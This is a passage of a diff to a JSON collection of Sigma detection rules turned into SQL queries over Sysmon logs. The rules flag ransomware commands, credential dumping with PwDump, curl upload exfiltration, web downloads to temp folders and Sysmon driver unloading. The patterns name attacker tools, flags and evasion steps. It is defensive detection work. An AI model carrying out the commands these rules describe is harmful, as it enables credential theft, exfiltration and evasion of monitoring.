'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "status": "test", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Authorized administrative activity" + "Very Possible" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.t1216" ], "falsepositives": [ - "Administrative script libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "status": "experimental", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.execution" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Legitimate administrative tasks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { "title": "PUA - NirCmd Execution As LOCAL SYSTEM", @@ -11988,339 +11859,363 @@ "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "status": "test", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "falsepositives": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_renamed_paexec.yml" + }, + { + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Unlikely" + "WindowsApps installing updates via the quiet flag" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": "47e4bab7-c626-47dc-967b-255608c9a920", + "title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "status": "experimental", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE 